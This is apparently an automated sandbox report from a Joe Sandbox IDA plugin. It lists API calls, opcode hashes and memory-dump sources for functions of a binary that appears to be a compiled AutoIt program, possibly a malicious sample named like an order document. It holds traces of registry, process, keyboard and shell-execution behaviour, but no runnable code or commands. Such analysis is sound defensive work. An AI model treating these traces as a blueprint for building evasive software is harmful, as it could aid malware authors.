                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 000E2AE7
                            Similarity
                            • API ID: BuffCharConnectRegistryUpper_memmove
                            • String ID:
                            • API String ID: 3479070676-0
                            • Opcode ID: 19de138309b6ecb28e669d4b125c3b79dc6770740c1e729c9d0075f0aedf4942
                            • Instruction ID: eaccf4351b240b17723db8cff79cf5d34778ee6bb24679d09a615627d7cb0dee
                            • Opcode Fuzzy Hash: 19de138309b6ecb28e669d4b125c3b79dc6770740c1e729c9d0075f0aedf4942
                            • Instruction Fuzzy Hash: 9D916A71204201AFCB04EF55C895BAEB7E9FF88310F14881DF596A72A2DB74E945CF42
                            APIs
                            • __mtinitlocknum.LIBCMT ref: 000AB744
                              • Part of subcall function 000A8A0C: __FF_MSGBANNER.LIBCMT ref: 000A8A21
                              • Part of subcall function 000A8A0C: __NMSG_WRITE.LIBCMT ref: 000A8A28
                              • Part of subcall function 000A8A0C: __malloc_crt.LIBCMT ref: 000A8A48
                            • __lock.LIBCMT ref: 000AB757
                            • __lock.LIBCMT ref: 000AB7A3
                            • InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,00136948,00000018,000B6C2B,?,00000000,00000109), ref: 000AB7BF
                            • EnterCriticalSection.KERNEL32(8000000C,00136948,00000018,000B6C2B,?,00000000,00000109), ref: 000AB7DC
                            • LeaveCriticalSection.KERNEL32(8000000C), ref: 000AB7EC
                            Similarity
                            • API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
                            • String ID:
                            • API String ID: 1422805418-0
                            • Opcode ID: c6efd49490ed4a0fc1fdddde92181aa578ba6cb603f9c236bc6eb6f5c1f2872c
                            • Instruction ID: 79959f92619cd432d9367b11756c9d7e140c4eaca45921378ee64885943f3d39
                            • Opcode Fuzzy Hash: c6efd49490ed4a0fc1fdddde92181aa578ba6cb603f9c236bc6eb6f5c1f2872c
                            • Instruction Fuzzy Hash: F7410971D042159BEB109FFCD8443ACB7A4BF47325F148228E529AB6E3DBB89941CB90
                            APIs
                            • InterlockedExchange.KERNEL32(?,000001F5), ref: 000CA1CE
                              • Part of subcall function 000A010A: std::exception::exception.LIBCMT ref: 000A013E
                              • Part of subcall function 000A010A: __CxxThrowException@8.LIBCMT ref: 000A0153
                            • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 000CA205
                            • EnterCriticalSection.KERNEL32(?), ref: 000CA221
                            • _memmove.LIBCMT ref: 000CA26F
                            • _memmove.LIBCMT ref: 000CA28C
                            • LeaveCriticalSection.KERNEL32(?), ref: 000CA29B
                            • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 000CA2B0
                            • InterlockedExchange.KERNEL32(?,000001F6), ref: 000CA2CF
                            Similarity
                            • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                            • String ID:
                            • API String ID: 256516436-0
                            • Opcode ID: 1a33cc3a3c439ecf6b786cdcb2430f7304abebdb5f658a8facb6a8a10e496339
                            • Instruction ID: d34b792f738c7286374c637e44606912e59fddb61ab8ee1fa906a069376a1e29
                            • Opcode Fuzzy Hash: 1a33cc3a3c439ecf6b786cdcb2430f7304abebdb5f658a8facb6a8a10e496339
                            • Instruction Fuzzy Hash: 97316171A00109EBCB00DF94DC85EAEB7B8FF45310B1480A9F905AB256DB70DD54DBA1
                            APIs
                            • DeleteObject.GDI32(00000000), ref: 000E8CF3
                            • GetDC.USER32(00000000), ref: 000E8CFB
                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 000E8D06
                            • ReleaseDC.USER32(00000000,00000000), ref: 000E8D12
                            • CreateFontW.GDI32(?,00000000,00000000,00000000,00000000,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 000E8D4E
                            • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 000E8D5F
                            • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,000EBB29,?,?,000000FF,00000000,?,000000FF,?), ref: 000E8D99
                            • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 000E8DB9
                            Similarity
                            • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                            • String ID:
                            • API String ID: 3864802216-0
                            • Opcode ID: d229763354aba58de06b677613e144713710e223ec8e44aef1580dbbda0c0999
                            • Instruction ID: 2f59246c3ddeb22b0044d0af3a4e752a288f313bf9d37adc88c753a3ca00c796
                            • Opcode Fuzzy Hash: d229763354aba58de06b677613e144713710e223ec8e44aef1580dbbda0c0999
                            • Instruction Fuzzy Hash: BD316D72200254BFEB108F91DC49FEA3FA9EF49755F044055FE48AA191CAB59841CB70
                            APIs
                              • Part of subcall function 000884A6: __swprintf.LIBCMT ref: 000884E5
                              • Part of subcall function 000884A6: __itow.LIBCMT ref: 00088519
                              • Part of subcall function 00083BCF: _wcscpy.LIBCMT ref: 00083BF2
                            • _wcstok.LIBCMT ref: 000D1D6E
                            • _wcscpy.LIBCMT ref: 000D1DFD
                            • _memset.LIBCMT ref: 000D1E30
                            Similarity
                            • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                            • String ID: X
                            • API String ID: 774024439-3081909835
                            • Opcode ID: 1cab8268c553d0412f58ed4f3d9f279f76efec50826896d617ab8d48271936ac
                            • Instruction ID: d43a565757a720ba8330f3a0079354e0678691b0c6c713b932b7f3c18780aec6
                            • Opcode Fuzzy Hash: 1cab8268c553d0412f58ed4f3d9f279f76efec50826896d617ab8d48271936ac
                            • Instruction Fuzzy Hash: F6C12831508301AFD764EF64C885ADAB7E4BF85310F10492EF89A973A2DB70ED45CB92
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 16fa7b74ae49ac4842830bc90c35436d5c7280853d5574b88575c9775d77482b
                            • Instruction ID: cbdb4a66dc845eb5c0fe97497b1b86a799ce2d6f78b84f4e4d97b3e0091e71fc
                            • Opcode Fuzzy Hash: 16fa7b74ae49ac4842830bc90c35436d5c7280853d5574b88575c9775d77482b
                            • Instruction Fuzzy Hash: DC717C71900509EFCF14CF98DD88ABEBBB4FF85324F148159F915AA252C734AA51EFA0
                            APIs
                            • _memset.LIBCMT ref: 000E214B
                            • _memset.LIBCMT ref: 000E2214
                            • ShellExecuteExW.SHELL32(?), ref: 000E2259
                              • Part of subcall function 000884A6: __swprintf.LIBCMT ref: 000884E5
                              • Part of subcall function 000884A6: __itow.LIBCMT ref: 00088519
                              • Part of subcall function 00083BCF: _wcscpy.LIBCMT ref: 00083BF2
                            • CloseHandle.KERNEL32(00000000), ref: 000E2320
                            • FreeLibrary.KERNEL32(00000000), ref: 000E232F
                            Similarity
                            • API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
                            • String ID: @
                            • API String ID: 4082843840-2766056989
                            • Opcode ID: 63c48c095b041ce94a97269273006c578ef7560c19a5003858ad464f3c7abd07
                            • Instruction ID: 584ff844457fc4da5d10d98ffc9a24514c7f142235a9c06db1015a3e61c2879f
                            • Opcode Fuzzy Hash: 63c48c095b041ce94a97269273006c578ef7560c19a5003858ad464f3c7abd07
                            • Instruction Fuzzy Hash: B2716975A006199FCF04EFA5C9959AEB7F9FF48310B108059E896BB352DB30AE40CB90
                            APIs
                            • GetParent.USER32(?), ref: 000C481D
                            • GetKeyboardState.USER32(?), ref: 000C4832
                            • SetKeyboardState.USER32(?), ref: 000C4893
                            • PostMessageW.USER32(?,00000101,00000010,?), ref: 000C48C1
                            • PostMessageW.USER32(?,00000101,00000011,?), ref: 000C48E0
                            • PostMessageW.USER32(?,00000101,00000012,?), ref: 000C4926
                            • PostMessageW.USER32(?,00000101,0000005B,?), ref: 000C4949
                            Similarity
                            • API ID: MessagePost$KeyboardState$Parent
                            • String ID:
                            • API String ID: 87235514-0
                            • Opcode ID: a6517c0b8a46ca5838a0414279d1d4c5afa568b9e7f37b05d417a553186086f6
                            • Instruction ID: c2ba232579cbc884e418942c4037eacfe2035762ad90e54a3a59dfe61d495ebc
                            • Opcode Fuzzy Hash: a6517c0b8a46ca5838a0414279d1d4c5afa568b9e7f37b05d417a553186086f6
                            • Instruction Fuzzy Hash: 96519FA0A087D53DFB7647248C65FBEBEE9BB06304F08858DE1D5568D2C6E8AC88D750
                            APIs
                            • GetParent.USER32(00000000), ref: 000C4638
                            • GetKeyboardState.USER32(?), ref: 000C464D
                            • SetKeyboardState.USER32(?), ref: 000C46AE
                            • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 000C46DA
                            • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 000C46F7
                            • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 000C473B
                            • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 000C475C
                            Similarity
                            • API ID: MessagePost$KeyboardState$Parent
                            • String ID:
                            • API String ID: 87235514-0
                            • Opcode ID: c96163b82bd8e91774e76c223f600b6fd9beb93cb0f80a3288512dc6830d62ac
                            • Instruction ID: d468bd9ab00301fdda7142519b0b2ccc83ebf305f20791bf2f520a45aa6869e1
                            • Opcode Fuzzy Hash: c96163b82bd8e91774e76c223f600b6fd9beb93cb0f80a3288512dc6830d62ac
                            • Instruction Fuzzy Hash: AE51C2A09087D639FB3687248C65FBEBEE97B06304F08858DE1D5468C2D7D4EC98E751
                            Similarity
                            • API ID: _wcsncpy$LocalTime
                            • String ID:
                            • API String ID: 2945705084-0
                            • Opcode ID: 0c4dc4d65cafe75e6304d6d9ecacec4d9c670b6e33ca003acf37f447b5f2352e
                            • Instruction ID: 43917159014b39d0c5b4febfbb0e03d8033b378be9ca0442d43ba0d24075e815
                            • Opcode Fuzzy Hash: 0c4dc4d65cafe75e6304d6d9ecacec4d9c670b6e33ca003acf37f447b5f2352e
                            • Instruction Fuzzy Hash: B4412E75C1021475CB11EBF8C88AACFB7ACAF06310F508976E554F3162EE34E66587A9
                            APIs
                            • select.WSOCK32(00000000,00000001,00000000,00000000,?,000003E8,0011DBF0), ref: 000D9409
                            • WSAGetLastError.WSOCK32(00000000), ref: 000D9416
                            • __WSAFDIsSet.WSOCK32(00000000,00000001,00000000), ref: 000D943A
                            • #16.WSOCK32(?,?,00000000,00000000), ref: 000D9452
                            • _strlen.LIBCMT ref: 000D9484
                            • _memmove.LIBCMT ref: 000D94CA
                            • WSAGetLastError.WSOCK32(00000000), ref: 000D94F7
                            Similarity
                            • API ID: ErrorLast$_memmove_strlenselect
                            • String ID:
                            • API String ID: 2795762555-0
                            • Opcode ID: 27344ed1bd2088fc1091d99431841ecf6b71fb0612d07d4c468a8a243c0c6567
                            • Instruction ID: 9ba01d372e7d2d58ce4f6e3286b0c51e01a26f8bbb1627092523736eb79b130b
                            • Opcode Fuzzy Hash: 27344ed1bd2088fc1091d99431841ecf6b71fb0612d07d4c468a8a243c0c6567
                            • Instruction Fuzzy Hash: F0417F75600208AFDB14EBA4DD85EEEB7B9EF48314F10416AF51697293DB30EE41CB61
                            APIs
                            • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?), ref: 000E3C92
                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 000E3CBC
                            • FreeLibrary.KERNEL32(00000000), ref: 000E3D71
                              • Part of subcall function 000E3C63: RegCloseKey.ADVAPI32(?), ref: 000E3CD9
                              • Part of subcall function 000E3C63: FreeLibrary.KERNEL32(?), ref: 000E3D2B
                              • Part of subcall function 000E3C63: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 000E3D4E
                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 000E3D16
                            Similarity
                            • API ID: EnumFreeLibrary$CloseDeleteOpen
                            • String ID:
                            • API String ID: 395352322-0
                            • Opcode ID: 722f2494248309c939433bbc7b5071825a14b38f093ddba2a7b229d67e99a795
                            • Instruction ID: 550f10e5e9eb5535bd69432928227ea5c51c0d2543e115e6a110a02cff152fe9
                            • Opcode Fuzzy Hash: 722f2494248309c939433bbc7b5071825a14b38f093ddba2a7b229d67e99a795
                            • Instruction Fuzzy Hash: C0310B71901249BFDB159BD5EC89AFEBBBCEF08300F10016AB552A3151DA709F899BA0
                            APIs
                            • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 000E8DF4
                            • GetWindowLongW.USER32(00A1E1E0,000000F0), ref: 000E8E27
                            • GetWindowLongW.USER32(00A1E1E0,000000F0), ref: 000E8E5C
                            • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 000E8E8E
                            • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 000E8EB8
                            • GetWindowLongW.USER32(00000000,000000F0), ref: 000E8EC9
                            • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 000E8EE3
                            Similarity
                            • API ID: LongWindow$MessageSend
                            • String ID:
                            • API String ID: 2178440468-0
                            • Opcode ID: 0cb815a0c76e0568728ef550a2abfb079624b50ec73831416c512e1ff0f66203
                            • Instruction ID: 2ad4548d820e6b692aae867f3566f630aa32bbc4509c94280afd007445ec5b13
                            • Opcode Fuzzy Hash: 0cb815a0c76e0568728ef550a2abfb079624b50ec73831416c512e1ff0f66203
                            • Instruction Fuzzy Hash: 8D311435240251AFDB20CF9AEC84F5537E5FB4A714F1581A5F949AB6B2CFB2AC80DB40
                            APIs
                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 000C1734
                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 000C175A
                            • SysAllocString.OLEAUT32(00000000), ref: 000C175D
                            • SysAllocString.OLEAUT32(?), ref: 000C177B
                            • SysFreeString.OLEAUT32(?), ref: 000C1784
                            • StringFromGUID2.OLE32(?,?,00000028), ref: 000C17A9
                            • SysAllocString.OLEAUT32(?), ref: 000C17B7
                            Similarity
                            • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                            • String ID:
                            • API String ID: 3761583154-0
                            • Opcode ID: 58644d41f8e5b2a1791f54d102b4d8ea5bb8fd388d46b300dffb730a98cbc27c
                            • Instruction ID: 5aacc672cdf80dd89df346dce5237a91cfd0ce0233d311dc256cde720a91208d
                            • Opcode Fuzzy Hash: 58644d41f8e5b2a1791f54d102b4d8ea5bb8fd388d46b300dffb730a98cbc27c
                            • Instruction Fuzzy Hash: 58215175604219AFDB109BA8DC88DFE77FCEB0A3607508229F955DB291DA70EC818760
                            APIs
                              • Part of subcall function 000831B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 000831DA
                            • lstrcmpiW.KERNEL32(?,?), ref: 000C6A2B
                            • _wcscmp.LIBCMT ref: 000C6A49
                            • MoveFileW.KERNEL32(?,?), ref: 000C6A62
                              • Part of subcall function 000C6D6D: GetFileAttributesW.KERNEL32(?,?,00000000), ref: 000C6DBA
                              • Part of subcall function 000C6D6D: GetLastError.KERNEL32 ref: 000C6DC5
                              • Part of subcall function 000C6D6D: CreateDirectoryW.KERNEL32(?,00000000), ref: 000C6DD9
                            • _wcscat.LIBCMT ref: 000C6AA4
                            • SHFileOperationW.SHELL32(?), ref: 000C6B0C
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: File$AttributesCreateDirectoryErrorFullLastMoveNameOperationPath_wcscat_wcscmplstrcmpi
                            • String ID: \*.*
                            • API String ID: 2323102230-1173974218
                            • Opcode ID: f58ec78a166373b3fca9e0b76dc5090f99562a387f31560d6332e70b18b0db77
                            • Instruction ID: f2ff14da45eb750371e30691eb6aa2f921cdf0b5213aa3235ceebfec119d184b
                            • Opcode Fuzzy Hash: f58ec78a166373b3fca9e0b76dc5090f99562a387f31560d6332e70b18b0db77
                            • Instruction Fuzzy Hash: 14311371800219AACF60EFA4D845BDDB7B8AF08300F5445AAF509E3142EB759B89CF65
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: __wcsnicmp
                            • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                            • API String ID: 1038674560-2734436370
                            • Opcode ID: c156cbfea09d0f820889d788fdd9e3dd3b034f4f5eeba353894848f4058298d7
                            • Instruction ID: ff652023a7dbda86fde6598e1d37cc855dbbdc7329fb97b3151ad7a690035710
                            • Opcode Fuzzy Hash: c156cbfea09d0f820889d788fdd9e3dd3b034f4f5eeba353894848f4058298d7
                            • Instruction Fuzzy Hash: 7721263225462576D235A7749D12FFF73E89F5A300F20843EF98587183EB91AA83D391
                            APIs
                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 000C180D
                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 000C1833
                            • SysAllocString.OLEAUT32(00000000), ref: 000C1836
                            • SysAllocString.OLEAUT32 ref: 000C1857
                            • SysFreeString.OLEAUT32 ref: 000C1860
                            • StringFromGUID2.OLE32(?,?,00000028), ref: 000C187A
                            • SysAllocString.OLEAUT32(?), ref: 000C1888
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                            • String ID:
                            • API String ID: 3761583154-0
                            • Opcode ID: efff1f5b9fa08cae2a30bc4701f1b66ba66d66229c165125717ce3aa0ee34cf4
                            • Instruction ID: 5dd4c5b49a9b8ebebf2ad0dd35fb950510e4a6b050a75c143e0a2067192e4140
                            • Opcode Fuzzy Hash: efff1f5b9fa08cae2a30bc4701f1b66ba66d66229c165125717ce3aa0ee34cf4
                            • Instruction Fuzzy Hash: 6E215675604204AFDB109BF8DC89DFE77ECEF0A360B408129F955DB6A1DA70EC858B64
                            APIs
                              • Part of subcall function 0009C619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0009C657
                              • Part of subcall function 0009C619: GetStockObject.GDI32(00000011), ref: 0009C66B
                              • Part of subcall function 0009C619: SendMessageW.USER32(00000000,00000030,00000000), ref: 0009C675
                            • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 000EA13B
                            • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 000EA148
                            • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 000EA153
                            • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 000EA162
                            • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 000EA16E
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: MessageSend$CreateObjectStockWindow
                            • String ID: Msctls_Progress32
                            • API String ID: 1025951953-3636473452
                            • Opcode ID: 16a8f22911ee6e0af3e28ea865f85bfa639072c7980279132e84c11226bc2b93
                            • Instruction ID: f105c347c849dfd5223871284e7c19c969efb0672b4579ea8c0f8b18c48bd931
                            • Opcode Fuzzy Hash: 16a8f22911ee6e0af3e28ea865f85bfa639072c7980279132e84c11226bc2b93
                            • Instruction Fuzzy Hash: 0511B6B124021DBEEF154F61CC85EE77F5DEF0D798F014115F604A6090C676AC61DBA0
                            APIs
                            • GetClientRect.USER32(?,?), ref: 0009C6C0
                            • GetWindowRect.USER32(?,?), ref: 0009C701
                            • ScreenToClient.USER32(?,?), ref: 0009C729
                            • GetClientRect.USER32(?,?), ref: 0009C856
                            • GetWindowRect.USER32(?,?), ref: 0009C86F
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Rect$Client$Window$Screen
                            • String ID:
                            • API String ID: 1296646539-0
                            • Opcode ID: 08b795551cce7c9c15211c1567327d2e6f8c03bca117277a5c68f3513c0babcc
                            • Instruction ID: 758518af869c91b0fcab97f12329ff653b86baf66ce1eebe5de05164e806fbd7
                            • Opcode Fuzzy Hash: 08b795551cce7c9c15211c1567327d2e6f8c03bca117277a5c68f3513c0babcc
                            • Instruction Fuzzy Hash: E2B13A79900249DBEF50CFA8C580BEEB7B1FF08310F149169ED59EB655DB30A940EB64
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: _memmove$__itow__swprintf
                            • String ID:
                            • API String ID: 3253778849-0
                            • Opcode ID: 393073a4f73e22837f2b85775877da757f7406cf2603c2931cb838de39875670
                            • Instruction ID: e8f09cbf2f75d2b44279dab6d2a4d074705f62fd7a50e0715b788f92ba92eb05
                            • Opcode Fuzzy Hash: 393073a4f73e22837f2b85775877da757f7406cf2603c2931cb838de39875670
                            • Instruction Fuzzy Hash: DE61983150425AABDF05EF60CC86FFE37A9AF05304F048559F89AAB293EB34E905CB51
                            APIs
                            • CreateToolhelp32Snapshot.KERNEL32 ref: 000E1B09
                            • Process32FirstW.KERNEL32(00000000,?), ref: 000E1B17
                            • __wsplitpath.LIBCMT ref: 000E1B45
                              • Part of subcall function 000A297D: __wsplitpath_helper.LIBCMT ref: 000A29BD
                            • _wcscat.LIBCMT ref: 000E1B5A
                            • Process32NextW.KERNEL32(00000000,?), ref: 000E1BD0
                            • CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 000E1BE2
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
                            • String ID:
                            • API String ID: 1380811348-0
                            • Opcode ID: b8d4926b8df9415f9f08467531e28ccc2ccdb480a5851249762cf1937daf90d6
                            • Instruction ID: 6ae84bbf6e0870210d27130e31f07f8458754dabd00ccddb55103b32eaed45a9
                            • Opcode Fuzzy Hash: b8d4926b8df9415f9f08467531e28ccc2ccdb480a5851249762cf1937daf90d6
                            • Instruction Fuzzy Hash: 77516D71504341AFD710EF64D885EEBB7ECAF88754F10492EF58997252EB70EA04CBA2
                            APIs
                              • Part of subcall function 0008CAEE: _memmove.LIBCMT ref: 0008CB2F
                              • Part of subcall function 000E3AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,000E2AA6,?,?), ref: 000E3B0E
                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 000E2FA0
                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 000E2FE0
                            • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 000E3003
                            • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 000E302C
                            • RegCloseKey.ADVAPI32(?,?,00000000), ref: 000E306F
                            • RegCloseKey.ADVAPI32(00000000), ref: 000E307C
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                            • String ID:
                            • API String ID: 4046560759-0
                            • Opcode ID: 1333780b0fef21edf5e951451a91526fb3325291e68c617dd0612d6cd8156812
                            • Instruction ID: fc044b199639a9f5bcb236a4cb359cebf3f64a25775e7bc4919a679ecb81c415
                            • Opcode Fuzzy Hash: 1333780b0fef21edf5e951451a91526fb3325291e68c617dd0612d6cd8156812
                            • Instruction Fuzzy Hash: B0515931108244AFC714EF64C895EAEBBF9FF88304F04492EF595972A2DB71EA05CB52
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: _wcscpy$_wcscat
                            • String ID:
                            • API String ID: 2037614760-0
                            • Opcode ID: f1f98a6ec25caa01f90f5d415b32dc8c6c5e2b15692a0a50f5ac00c05728c96b
                            • Instruction ID: 08ebe81ee1feb94769ceccc03a395135eb22c48772c2cee2e8f92c488fe0eaef
